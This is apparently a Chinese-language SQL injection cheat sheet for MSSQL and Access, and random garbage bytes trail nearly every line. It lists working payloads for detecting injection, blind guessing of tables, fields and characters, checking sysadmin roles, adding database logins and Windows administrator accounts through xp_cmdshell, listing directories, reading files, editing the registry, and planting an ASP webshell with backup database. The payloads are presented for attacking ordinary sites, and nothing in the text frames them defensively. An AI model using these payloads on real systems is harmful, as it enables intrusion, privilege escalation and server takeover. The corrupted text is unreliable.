1.判断是否有注入;and 1=1 ;and 1=2 �oos35xV�.
2.初步判断是否是mssql ;and user>0 �cA�c �i2e
]jzINa�Mav
3.注入参数是字符'and [查询条件] and ''=' ��VSkx;��P
V-�w�[\�u�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �o*�u A+7n
_9�Ig`?<>I
5.判断数据库系统 :�Y��[r^=>
7>m#Y'ppl@
;and (select count(*) from sysobjects)>0 mssql W$B�x?}x($
:q4��Mn�r
;and (select count(*) from msysobjects)>0 access $*H>�n!&�
�9D_4]'�KG
Q'��^]�lVY
AS��L�RP��
6.猜数据库 ;and (select Count(*) from [数据库名])>0 mY�k5f�_�}
|C S[>0mV!
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ��'�vTD7a^
pDlh�^?cux
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 .-N9\GlJ,d
+*��
)Qi)�
9.(1)猜字段的ascii值(access) "��Fa�G5X(
UgJ^�NF2w
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 GKP�qBi[rO
[:!#F�7O-�
(2)猜字段的ascii值(mssql) s/W��g^(&M
�TR@�$$RrU
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ,Q�l3R�O�,
X�b3vvHdI�
10.测试权限结构(mssql) h{�ce+~X�
�(s{%XB:�K
s$:]�$&5��
�J\������
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- :"O=/p+*Us
D�l/UZ@8pl
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �l�L�tC9:�
fC%;|V'N�d
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
�VV]�{R'�
�n]co���qJ
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- _z���m<[0(
�Q�:VD�2<2
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �wQnr*kyza
+I\��bs.84
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ��3��[aJ=5
G';o�M;~/|
;and 1=(select IS_MEMBER('db_owner'));-- ��x'Jf��Rz
o�n&N=�T�N
|klL� �KX&
��p7H*�Ff`
11.添加mssql和系统的帐户 �n7<<�}wcV
��-R�7f/a8
;exec master.dbo.sp_addlogin username;-- ;co{bk|rj�
;exec master.dbo.sp_password null,username,password;-- �u{p\8�v%7
"�v*RY "5#
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Z^�GriL�
�FT����(EH
;exec master.dbo.xp_cmdshell 'net user username password X�cfT�E
m
n�{'�
[[2U
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 9�'5,V{pj
\HK#d1>ox�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- l3iL�.?&Pa
[sKdIw_��
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- .�=@M>�TZM
[��[�s �k�
/CA�)R26�G
�KP<J~+_ik
12.(1)遍历目录 D *L�Z��_
#sqD�Z�]\B
;create table dirs(paths varchar(100), id int) �3&?Tc|F+�
�[#R%jLEJ2
;insert dirs exec master.dbo.xp_dirtree 'c:\' h0^V!.-��5
[�Z5x_.k"I
;and (select top 1 paths from dirs)>0 *!s4�#|��h
�ap6�Vmp��
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �h;��ShN�U
|�[{;*�wtv
U<6k�!Y9ny
lP�9I\�Ge&
(2)遍历目录 D �1hKjB&�
Dh9-~�}sW'
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- M3t_!�HP}!
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 rf`Br�\g�8
n~)Y%�xe[U
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 +p�cj�8K%�
��\��
qs6%
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 I�i��y:<c
_E30t( _.�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Q�s?+vk?*h
=�6W�:�O��
)�>�Lsj1qk
,j���t098W
13.mssql中的存储过程 |@�@�mq!>-
Ch.�T�}��%
xp_regenumvalues 注册表根键, 子键 T�*{zL���
��}DM2#E`_
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 DS$ _"'g%i
U1"t�|KW8�
xp_regread 根键,子键,键值名 �b?b�Y�PN+
Gz6GU.IyQy
;exec xp_regread .�y0](�
�h
{��&<}�*4D
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 |�,7J!7T(I
g~y9j8�8?
xp_regwrite 根键,子键, 值名, 值类型, 值 $3[c�BX.=�
!:n),sFv45
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 &=?`�;��K�
Z*TW;h0ZQ3
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �Z�n/9�BO5
�RY�V6hp)|
xp_regdeletevalue 根键,子键,值名 /-h�F<�oNQ
��={b
]��
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 28)�TXRr-
�23f[i�<4e
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 :1�lE98�=�
&�53#`�WgJ
�d=#�p w*w
�^k�l��9U+
14.mssql的backup创建webshell J�@GfO\
o
R_qo]WvR;�
use model �`O�f wl%G
\i,cL)H�M�
create table cmd(str image); YDNqWP7s
v2n0�[�b0�
insert into cmd(str) values (''); )a^Yor)�o"
��p\{�+l;`
backup database model to disk='c:\l.asp'; {�IMz�R'PN
ZmULy;{<)�
��b�aNfS�
R�2�$��U K
15.mssql内置函数 J�rk�^J6aa
7idi�&��h"
;and (select @@version)>0 获得Windows的版本号 �<nv�WC/LU
�99�!{[gOv
;and user_name()='dbo' 判断当前系统的连接用户是不是sa IPO[J^�#Me
�3�\KI�I9�
;and (select user_name())>0 爆当前系统的连接用户 BJ9sR.yX62
^@Qi&g`lr?
;and (select db_name())>0 得到当前连接的数据库 :6�u�3Mj{
&'7"i�~�pC
pIu H*4Vz�
%;Z b�Q�9
16.简洁的webshell ���j/9��QV
�Z)�
X�s;7
use model ��}%YHm�9)
n�r>�{ uTa
create table cmd(str image); tHt�V[We.:
jAK{<�7v4U
insert into cmd(str) values (''); �
xD�����
�R9l7C�JM@
backup database model to disk='g:\wwwtest\l.asp';
